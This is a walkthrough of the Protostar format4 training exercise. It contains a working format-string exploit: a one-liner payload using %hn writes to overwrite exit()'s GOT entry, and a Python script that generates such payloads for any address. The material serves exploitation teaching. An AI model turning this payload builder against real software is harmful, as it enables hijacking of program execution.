Protostar vm, format4

Here is the source of the vulnerable program:

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

int target;

void hello()
{
  printf("code execution redirected! you win\n");
  _exit(1);
}

void vuln()
{
  char buffer[512];

  fgets(buffer, sizeof(buffer), stdin);

  /* user-controlled format string: the vulnerability */
  printf(buffer);

  /* vuln() never returns, the only way out is this call to exit() */
  exit(1);
}

int main(int argc, char **argv)
{
  vuln();
}

Again a slight variation of the previous challenge: as in format3, we use the format string to write an arbitrary value at an arbitrary address, but this time we have to redirect the execution flow with it. vuln() never returns, it calls exit(), so we overwrite the GOT entry of exit() with the address of hello(): when printf() returns and vuln() calls exit(), the jump through the PLT lands in hello() instead.

Thanks to the hint, we can easily spot the right addresses:

user@protostar:~$ objdump -t /opt/protostar/bin/format4 | grep hello
080484b4 g F .text 0000001e hello

user@protostar:~$ objdump -TR /opt/protostar/bin/format4
/opt/protostar/bin/format4: file format elf32-i386

DYNAMIC SYMBOL TABLE:
00000000 w D *UND* 00000000 __gmon_start__
00000000 DF *UND* 00000000 GLIBC_2.0 fgets
00000000 DF *UND* 00000000 GLIBC_2.0 __libc_start_main
00000000 DF *UND* 00000000 GLIBC_2.0 _exit
00000000 DF *UND* 00000000 GLIBC_2.0 printf
00000000 DF *UND* 00000000 GLIBC_2.0 puts
00000000 DF *UND* 00000000 GLIBC_2.0 exit
080485ec g DO .rodata 00000004 Base _IO_stdin_used
08049730 g DO .bss 00000004 GLIBC_2.0 stdin


DYNAMIC RELOCATION RECORDS
OFFSET TYPE VALUE
080496fc R_386_GLOB_DAT __gmon_start__
08049730 R_386_COPY stdin
0804970c R_386_JUMP_SLOT __gmon_start__
08049710 R_386_JUMP_SLOT fgets
08049714 R_386_JUMP_SLOT __libc_start_main
08049718 R_386_JUMP_SLOT _exit
0804971c R_386_JUMP_SLOT printf
08049720 R_386_JUMP_SLOT puts
08049724 R_386_JUMP_SLOT exit


user@protostar:~$ /opt/protostar/bin/./format4
ABAB%X.%X.%X.%X.%X.%X.
ABAB200.B7FD8420.BFFFF604.42414241.252E5825.58252E58.
user@protostar:~$

We have to write 0x080484b4 at 0x08049724 (the GOT slot of exit()). Our string is accessible as the 4th parameter of printf: the 4th %X printed 42414241, which is "ABAB" read as a little-endian dword. I discovered that I could write 16-bit integers using the %hn modifier, which stores the number of characters printed so far as a short. This way I can write the desired address in two steps, which keeps the padding small (writing 0x080484b4 with a single %n would mean printing over 134 million characters).

So here is what is going to be written and where (little endian, so the low half goes at the lower address):

08049724 -> 0x84b4

08049726 -> 0x0804

My payload is pretty much the same as last time. The two addresses take 8 bytes, so after %2044x the count is 2052 = 0x0804, which %4$hn stores at 0x08049726; another %31920x brings it to 33972 = 0x84b4, which %5$hn stores at 0x08049724. The smaller value has to be written first, since the count only grows:

user@protostar:~$ python -c 'print "\x26\x97\x04\x08\x24\x97\x04\x08%2044x%4$hn%31920x%5$hn"' > payload 
user@protostar:~$ cat payload - | /opt/protostar/bin/./format4
&�$�200 b7fd8420
code execution redirected! you win

Working!
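As an added example (not part of the original write-up, and written for Python 3 rather than the Python 2 one-liner above), here is a script that automates the padding computation done by hand and checks the result with a small model of the printf behaviour the exploit relies on. It generalises the technique: the two halves are ordered so that the smaller count comes first, the widths are reduced modulo 2^16, and addresses containing a NUL or newline byte are refused because fgets or printf would cut the string short. The leaked stack words (0x200, 0xb7fd8420, 0xbffff604) are taken from the %X probe above and are only a constructed model of the stack; the simulator handles just the %Nx and %k$hn conversions that the payload uses.

```python
import re
import struct

# Constructed model of the printf arguments as leaked by the probe
# "ABAB%X.%X.%X.%X.%X.%X." (200.B7FD8420.BFFFF604.42414241...):
# three words below the buffer, then the buffer itself as argument 4.
FORMAT4_LEAK = [0x200, 0xB7FD8420, 0xBFFFF604]
FORMAT4_BUFFER_ARG = 4

EXIT_GOT = 0x08049724   # R_386_JUMP_SLOT exit, from objdump -R
HELLO = 0x080484B4      # hello(), from objdump -t


def build_hn_payload(target_addr, value, buffer_arg, prefix_len=0):
    """Return a format string that writes the 32-bit `value` at
    `target_addr` with two %hn writes, the way the format4 payload does.

    buffer_arg is the printf argument number at which our buffer starts
    (4 on format4); prefix_len is the number of bytes already printed
    before the buffer is echoed (0 here, printf(buffer) is the first output).
    """
    halves = [(target_addr, value & 0xFFFF),              # low half  -> addr
              (target_addr + 2, (value >> 16) & 0xFFFF)]  # high half -> addr+2
    # %hn stores the running character count, which only grows,
    # so the smaller half must be written first.
    halves.sort(key=lambda h: h[1])

    addrs = b"".join(struct.pack("<I", addr) for addr, _ in halves)
    if b"\x00" in addrs or b"\n" in addrs:
        raise ValueError("address bytes would stop fgets/printf early")

    written = prefix_len + len(addrs)
    fmt = ""
    for i, (_, half) in enumerate(halves):
        pad = (half - written) % 0x10000
        # %Nx prints max(N, len(hex(arg))) characters and a 32-bit argument
        # is at most 8 hex digits, so bump tiny widths by 0x10000, which the
        # 16-bit %hn store discards anyway.
        if pad < 8:
            pad += 0x10000
        fmt += "%%%dx%%%d$hn" % (pad, buffer_arg + i)
        written += pad
    return addrs + fmt.encode()


def simulate_printf(payload, stack_args):
    """Model of the glibc behaviour the exploit relies on: %Nx consumes the
    next sequential argument and prints at least N characters, %k$hn stores
    the count so far (truncated to 16 bits) at the address in argument k.
    Returns {address: value} for every %hn write."""
    s = payload.decode("latin-1")
    spec = re.compile(r"%(\d*)x|%(\d+)\$hn")
    count, next_arg, pos, writes = 0, 0, 0, {}
    for m in spec.finditer(s):
        count += m.start() - pos        # literal bytes before this conversion
        pos = m.end()
        if m.group(2) is None:          # %Nx
            width = int(m.group(1) or 0)
            arg = stack_args[next_arg]
            next_arg += 1
            count += max(width, len("%x" % arg))
        else:                           # %k$hn
            writes[stack_args[int(m.group(2)) - 1]] = count & 0xFFFF
    return writes


def format4_stack(payload):
    """The printf argument list as format4 sees it for this payload."""
    return FORMAT4_LEAK + list(struct.unpack("<II", payload[:8]))


def format4_payload():
    return build_hn_payload(EXIT_GOT, HELLO, FORMAT4_BUFFER_ARG)


if __name__ == "__main__":
    p = format4_payload()
    print(p)
    writes = simulate_printf(p, format4_stack(p))
    print({hex(a): hex(v) for a, v in writes.items()})
```

format4_payload() reproduces the exact string used above, and the simulator confirms it stores 0x0804 at 0x08049726 and 0x84b4 at 0x08049724. Feeding it a value whose high half is larger than its low half (for instance 0x08040001) shows the ordering and the modulo arithmetic at work: the script then writes the low address first with a width of 65529 and lets the 16-bit count wrap around.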